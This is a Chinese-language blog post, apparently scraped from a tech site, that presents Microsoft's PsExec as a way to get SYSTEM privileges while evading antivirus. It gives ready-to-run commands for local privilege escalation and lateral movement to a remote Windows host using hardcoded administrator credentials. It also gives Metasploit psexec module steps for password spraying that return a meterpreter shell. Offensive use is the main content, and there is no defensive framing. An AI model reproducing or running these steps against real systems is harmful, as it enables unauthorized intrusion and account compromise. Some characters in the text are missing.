psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限
PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程,
并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。
PsExec的基本原理是:
通过管道在远程目标机器上创建一个psexec服务,
并在本地磁盘中生成一个名为PSEXESVC的二进制文件,
然后通过psexec服务运行命令,运行结束后删除任务。
利用条件
PsExec下载地址
优点:可以躲避检测无视杀毒软件,直接system权限
基本使用命令
“
PsExec.exe /s cmd # 本地提权,还有一个提权作用,直接system权限
PsExec.exe 127.0.0.1 -u Administrator -p 123qwe@@ /s cmd # 本地提权
PsExec.exe 172.16.1.132 -u Administrator -p 123qwe@@ /s cmd # 横向入侵Windows主机,直接system权限
“
直接返回一个system权限的shell
Metasploit中的psexec模块
密码喷洒指的是用一个密码对多个账 对目标进行枚举爆破,躲避密码输入错误过多导致封锁账
利用metasploit进行密码喷洒
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set smbuser user.txt
msf6 exploit(windows/smb/psexec) > set smbpass password.txt
msf6 exploit(windows/smb/psexec) > set rhost 172.16.1.132
msf6 exploit(windows/smb/psexec) > run
成功后直接返回一个system权限的主机上线msf
很多框架的集成了psexec工具,比如CS内 大杀器也结成了这个工具。总之就是牛逼6666
文章知识点与官方知识档案匹配,可进一步学习相关知识 络技能树首页概览22588 人正在系统学习中
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!